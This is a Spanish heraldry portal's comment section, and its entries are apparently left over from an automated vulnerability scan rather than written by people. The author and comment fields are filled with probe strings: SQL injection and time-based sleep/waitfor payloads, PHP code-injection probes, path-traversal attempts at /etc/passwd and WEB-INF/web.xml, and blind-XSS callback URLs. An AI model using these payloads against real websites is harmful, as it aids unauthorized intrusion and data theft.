Escrito por Http://testasp.vulnweb.co el 06-04-2020
Mi nota:


1
Escrito por http://testasp.vulnweb.co el 06-04-2020
Mi nota:


1
Escrito por testasp.vulnweb.com el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


http://hitlZyDgNSFdF.bxss.me/
Escrito por Anónimo el 06-04-2020
Mi nota:


http://hitM3iFAhpu9U.bxss.me/
Escrito por Anónimo el 06-04-2020
Mi nota:


http://hit20riijSkyp.bxss.me/
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1'"
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


@@sZwkh
Escrito por Anónimo el 06-04-2020
Mi nota:


JyI=
Escrito por Anónimo el 06-04-2020
Mi nota:


'"
Escrito por Anónimo el 06-04-2020
Mi nota:


''""
Escrito por Anónimo el 06-04-2020
Mi nota:


(select convert(int,CHAR(65)))
Escrito por Anónimo el 06-04-2020
Mi nota:


1'"
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


@@G2kLC
Escrito por Anónimo el 06-04-2020
Mi nota:


JyI=
Escrito por Anónimo el 06-04-2020
Mi nota:


'"
Escrito por Anónimo el 06-04-2020
Mi nota:


''""
Escrito por reviews.php el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


(select convert(int,CHAR(65)))
Escrito por reviews.php el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1'"
Escrito por reviews.php/. el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por reviews.php el 06-04-2020
Mi nota:


1
Escrito por reviews.php el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


@@Eliak
Escrito por reviews.php/. el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


JyI=
Escrito por reviews.php el 06-04-2020
Mi nota:


1
Escrito por http://hitrXPh4DeLxN.bxss el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


'"
Escrito por reviews.php el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


''""
Escrito por http://hit19Nfj15qXr.bxss el 06-04-2020
Mi nota:


1
Escrito por reviews.php/. el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


(select convert(int,CHAR(65)))
Escrito por http://hitpgF45xfr1S.bxss el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
Escrito por Anónimo el 06-04-2020
Mi nota:


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
Escrito por Anónimo el 06-04-2020
Mi nota:


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por ))))))))))))))))))))))))) el 06-04-2020
Mi nota:


1
Escrito por ))))))))))))))))))))))))) el 06-04-2020
Mi nota:


1
Escrito por ))))))))))))))))))))))))) el 06-04-2020
Mi nota:


1
Escrito por ;print(md5(acunetix_wvs_s el 06-04-2020
Mi nota:


1
Escrito por ';print(md5(acunetix_wvs_ el 06-04-2020
Mi nota:


1
Escrito por ";print(md5(acunetix_wvs_ el 06-04-2020
Mi nota:


1
Escrito por ${@print(md5(acunetix_wvs el 06-04-2020
Mi nota:


1
Escrito por ${@print(md5(acunetix_wvs el 06-04-2020
Mi nota:


1
Escrito por ;print(md5(acunetix_wvs_s el 06-04-2020
Mi nota:


1
Escrito por ';print(md5(acunetix_wvs_ el 06-04-2020
Mi nota:


1
Escrito por ";print(md5(acunetix_wvs_ el 06-04-2020
Mi nota:


1
Escrito por ${@print(md5(acunetix_wvs el 06-04-2020
Mi nota:


1
Escrito por ${@print(md5(acunetix_wvs el 06-04-2020
Mi nota:


1
Escrito por ;print(md5(acunetix_wvs_s el 06-04-2020
Mi nota:


1
Escrito por ';print(md5(acunetix_wvs_ el 06-04-2020
Mi nota:


1
Escrito por ";print(md5(acunetix_wvs_ el 06-04-2020
Mi nota:


1
Escrito por ${@print(md5(acunetix_wvs el 06-04-2020
Mi nota:


1
Escrito por ${@print(md5(acunetix_wvs el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por 1'" el 06-04-2020
Mi nota:


1
Escrito por \ el 06-04-2020
Mi nota:


1
Escrito por 1 el 06-04-2020
Mi nota:


1
Escrito por @@1nItl el 06-04-2020
Mi nota:


1
Escrito por JyI= el 06-04-2020
Mi nota:


1
Escrito por '" el 06-04-2020
Mi nota:


1
Escrito por ''"" el 06-04-2020
Mi nota:


1
Escrito por (select convert(int,CHAR( el 06-04-2020
Mi nota:


1
Escrito por 1'" el 06-04-2020
Mi nota:


1
Escrito por \ el 06-04-2020
Mi nota:


1
Escrito por 1 el 06-04-2020
Mi nota:


1
Escrito por @@VJlBz el 06-04-2020
Mi nota:


1
Escrito por JyI= el 06-04-2020
Mi nota:


1
Escrito por '" el 06-04-2020
Mi nota:


1
Escrito por ''"" el 06-04-2020
Mi nota:


1
Escrito por (select convert(int,CHAR( el 06-04-2020
Mi nota:


1
Escrito por 1'" el 06-04-2020
Mi nota:


1
Escrito por \ el 06-04-2020
Mi nota:


1
Escrito por 1 el 06-04-2020
Mi nota:


1
Escrito por @@XdgjF el 06-04-2020
Mi nota:


1
Escrito por JyI= el 06-04-2020
Mi nota:


1
Escrito por '" el 06-04-2020
Mi nota:


1
Escrito por ''"" el 06-04-2020
Mi nota:


1
Escrito por (select convert(int,CHAR( el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por An%c3%b3nimo el 06-04-2020
Mi nota:


1
Escrito por An%c3%b3nimo el 06-04-2020
Mi nota:


1
Escrito por -1 OR 2+334-334-1=0+0+0+1 el 06-04-2020
Mi nota:


1
Escrito por -1 OR 2+53-53-1=0+0+0+1 el 06-04-2020
Mi nota:


1
Escrito por -1' OR 2+469-469-1=0+0+0+ el 06-04-2020
Mi nota:


1
Escrito por -1' OR 2+451-451-1=0+0+0+ el 06-04-2020
Mi nota:


1
Escrito por -1" OR 2+720-720-1=0+0+0+ el 06-04-2020
Mi nota:


1
Escrito por if(now()=sysdate(),sleep( el 06-04-2020
Mi nota:


1
Escrito por (select(0)from(select(sle el 06-04-2020
Mi nota:


1
Escrito por 1 waitfor delay '0:0:27' el 06-04-2020
Mi nota:


1
Escrito por Rxv4znLz'; waitfor delay el 06-04-2020
Mi nota:


1
Escrito por 7OfHzxNo';select pg_sleep el 06-04-2020
Mi nota:


1
Escrito por aGJ66bjH');select pg_slee el 06-04-2020
Mi nota:


1
Escrito por a7w9yxc5'));select pg_sle el 06-04-2020
Mi nota:


1
Escrito por An%c3%b3nimo el 06-04-2020
Mi nota:


1
Escrito por An%c3%b3nimo el 06-04-2020
Mi nota:


1
Escrito por -1 OR 2+577-577-1=0+0+0+1 el 06-04-2020
Mi nota:


1
Escrito por -1 OR 2+281-281-1=0+0+0+1 el 06-04-2020
Mi nota:


1
Escrito por -1' OR 2+737-737-1=0+0+0+ el 06-04-2020
Mi nota:


1
Escrito por -1' OR 2+105-105-1=0+0+0+ el 06-04-2020
Mi nota:


1
Escrito por -1" OR 2+111-111-1=0+0+0+ el 06-04-2020
Mi nota:


1
Escrito por if(now()=sysdate(),sleep( el 06-04-2020
Mi nota:


1
Escrito por (select(0)from(select(sle el 06-04-2020
Mi nota:


1
Escrito por 1 waitfor delay '0:0:30' el 06-04-2020
Mi nota:


1
Escrito por Hkd40Um0'; waitfor delay el 06-04-2020
Mi nota:


1
Escrito por zRrzmLKn';select pg_sleep el 06-04-2020
Mi nota:


1
Escrito por xE9oRnDj');select pg_slee el 06-04-2020
Mi nota:


1
Escrito por S55pZXzn'));select pg_sle el 06-04-2020
Mi nota:


1
Escrito por An%c3%b3nimo el 06-04-2020
Mi nota:


1
Escrito por An%c3%b3nimo el 06-04-2020
Mi nota:


1
Escrito por -1 OR 2+771-771-1=0+0+0+1 el 06-04-2020
Mi nota:


1
Escrito por -1 OR 2+437-437-1=0+0+0+1 el 06-04-2020
Mi nota:


1
Escrito por -1' OR 2+730-730-1=0+0+0+ el 06-04-2020
Mi nota:


1
Escrito por -1' OR 2+154-154-1=0+0+0+ el 06-04-2020
Mi nota:


1
Escrito por -1" OR 2+292-292-1=0+0+0+ el 06-04-2020
Mi nota:


1
Escrito por if(now()=sysdate(),sleep( el 06-04-2020
Mi nota:


1
Escrito por (select(0)from(select(sle el 06-04-2020
Mi nota:


1
Escrito por 1 waitfor delay '0:0:11' el 06-04-2020
Mi nota:


1
Escrito por JuZYCC5K'; waitfor delay el 06-04-2020
Mi nota:


1
Escrito por qeyZJbgX';select pg_sleep el 06-04-2020
Mi nota:


1
Escrito por cLxF20lQ');select pg_slee el 06-04-2020
Mi nota:


1
Escrito por FGIHSvbZ'));select pg_sle el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ..%2F..%2F..%2F..%2F..%2F el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ..%2F..%2F..%2F..%2F..%2F el 06-04-2020
Mi nota:


1
Escrito por /../..//../..//../..//../ el 06-04-2020
Mi nota:


1
Escrito por .\\./.\\./.\\./.\\./.\\./ el 06-04-2020
Mi nota:


1
Escrito por /etc/passwd el 06-04-2020
Mi nota:


1
Escrito por %2fetc%2fpasswd el 06-04-2020
Mi nota:


1
Escrito por /.././.././.././.././../. el 06-04-2020
Mi nota:


1
Escrito por ../..//../..//../..//../. el 06-04-2020
Mi nota:


1
Escrito por ../.../.././../.../.././. el 06-04-2020
Mi nota:


1
Escrito por ............. el 06-04-2020
Mi nota:


1
Escrito por invalid../../../../../../ el 06-04-2020
Mi nota:


1
Escrito por file:///etc/passwd el 06-04-2020
Mi nota:


1
Escrito por /\../\../\../\../\../\../ el 06-04-2020
Mi nota:


1
Escrito por WEB-INF/web.xml el 06-04-2020
Mi nota:


1
Escrito por /WEB-INF/web.xml el 06-04-2020
Mi nota:


1
Escrito por WEB-INF\web.xml el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por el 06-04-2020
Mi nota:


1
Escrito por ................windowswi el 06-04-2020
Mi nota:


1
Escrito por ..\..\..\..\..\..\..\..\w el 06-04-2020
Mi nota:


1
Escrito por /.\\./.\\./.\\./.\\./.\\. el 06-04-2020
Mi nota:


1
Escrito por ../..//../..//../..//../. el 06-04-2020
Mi nota:


1
Escrito por ../.../.././../.../.././. el 06-04-2020
Mi nota:


1
Escrito por unexisting/../../../../.. el 06-04-2020
Mi nota:


1
Escrito por WEB-INF/web.xml el 06-04-2020
Mi nota:


1
Escrito por WEB-INF\web.xml el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ..%2F..%2F..%2F..%2F..%2F el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ..%2F..%2F..%2F..%2F..%2F el 06-04-2020
Mi nota:


1
Escrito por /../..//../..//../..//../ el 06-04-2020
Mi nota:


1
Escrito por .\\./.\\./.\\./.\\./.\\./ el 06-04-2020
Mi nota:


1
Escrito por /etc/passwd el 06-04-2020
Mi nota:


1
Escrito por %2fetc%2fpasswd el 06-04-2020
Mi nota:


1
Escrito por /.././.././.././.././../. el 06-04-2020
Mi nota:


1
Escrito por ../..//../..//../..//../. el 06-04-2020
Mi nota:


1
Escrito por ../.../.././../.../.././. el 06-04-2020
Mi nota:


1
Escrito por ............. el 06-04-2020
Mi nota:


1
Escrito por invalid../../../../../../ el 06-04-2020
Mi nota:


1
Escrito por file:///etc/passwd el 06-04-2020
Mi nota:


1
Escrito por /\../\../\../\../\../\../ el 06-04-2020
Mi nota:


1
Escrito por WEB-INF/web.xml el 06-04-2020
Mi nota:


1
Escrito por /WEB-INF/web.xml el 06-04-2020
Mi nota:


1
Escrito por WEB-INF\web.xml el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por el 06-04-2020
Mi nota:


1
Escrito por ................windowswi el 06-04-2020
Mi nota:


1
Escrito por ..\..\..\..\..\..\..\..\w el 06-04-2020
Mi nota:


1
Escrito por /.\\./.\\./.\\./.\\./.\\. el 06-04-2020
Mi nota:


1
Escrito por ../..//../..//../..//../. el 06-04-2020
Mi nota:


1
Escrito por ../.../.././../.../.././. el 06-04-2020
Mi nota:


1
Escrito por unexisting/../../../../.. el 06-04-2020
Mi nota:


1
Escrito por WEB-INF/web.xml el 06-04-2020
Mi nota:


1
Escrito por WEB-INF\web.xml el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ..%2F..%2F..%2F..%2F..%2F el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ..%2F..%2F..%2F..%2F..%2F el 06-04-2020
Mi nota:


1
Escrito por /../..//../..//../..//../ el 06-04-2020
Mi nota:


1
Escrito por .\\./.\\./.\\./.\\./.\\./ el 06-04-2020
Mi nota:


1
Escrito por /etc/passwd el 06-04-2020
Mi nota:


1
Escrito por %2fetc%2fpasswd el 06-04-2020
Mi nota:


1
Escrito por /.././.././.././.././../. el 06-04-2020
Mi nota:


1
Escrito por ../..//../..//../..//../. el 06-04-2020
Mi nota:


1
Escrito por ../.../.././../.../.././. el 06-04-2020
Mi nota:


1
Escrito por ............. el 06-04-2020
Mi nota:


1
Escrito por invalid../../../../../../ el 06-04-2020
Mi nota:


1
Escrito por file:///etc/passwd el 06-04-2020
Mi nota:


1
Escrito por /\../\../\../\../\../\../ el 06-04-2020
Mi nota:


1
Escrito por WEB-INF/web.xml el 06-04-2020
Mi nota:


1
Escrito por /WEB-INF/web.xml el 06-04-2020
Mi nota:


1
Escrito por WEB-INF\web.xml el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por ../../../../../../../../. el 06-04-2020
Mi nota:


1
Escrito por el 06-04-2020
Mi nota:


1
Escrito por ................windowswi el 06-04-2020
Mi nota:


1
Escrito por ..\..\..\..\..\..\..\..\w el 06-04-2020
Mi nota:


1
Escrito por /.\\./.\\./.\\./.\\./.\\. el 06-04-2020
Mi nota:


1
Escrito por ../..//../..//../..//../. el 06-04-2020
Mi nota:


1
Escrito por ../.../.././../.../.././. el 06-04-2020
Mi nota:


1
Escrito por unexisting/../../../../.. el 06-04-2020
Mi nota:


1
Escrito por WEB-INF/web.xml el 06-04-2020
Mi nota:


1
Escrito por WEB-INF\web.xml el 06-04-2020
Mi nota:


1
Últimos publicados
Arteaga

38 escudos publicados





Desde 1996

Contador desde 2005


Sondeo

¿Desde qué país nos visitas?
 Argentina
 Bolivia
 Brasil
 Chile
 Colombia
 Costa Rica
 Cuba
 Ecuador
 El Salvador
 Estados Unidos
 Guatemala
 México
 Honduras
 Nicaragua
 Paraguay
 Perú
 Puerto Rico
 República Dominicana
 Venezuela
 Uruguay
 Alemania
 Bélgica
 España
 Francia
 Suiza
 Otro de Europa
 Filipinas
 Otro de Asia
 Australia
 Otro país

  Results, Résultats


  • Votos: 493
  • Comentario(s) : 1
 
 
 
POLITICA DE PRIVACIDAD: Google utiliza empresas publicitarias asociadas para publicar anuncios cuando visita nuestro sitio web.
Es posible que estas empresas usen la información que obtienen de sus visitas a este y otros sitios web (sin incluir su nombre, dirección, dirección de correo electrónico o número de teléfono) para ofrecerle anuncios sobre productos y servicios que le resulten de interés.
Si desea obtener más información sobre esta práctica y conocer sus opciones para impedir que estas empresas usen esta información, haga clic aquí

Google



Todos los logos y marcas son marcas registradas, los comentarios son de exclusiva responsabilidad de aquellos que los publican.
Este portal ha sido construído con NPDS, un sistema de portal escrito PHP. Este software está bajo licencia GNU/GPL .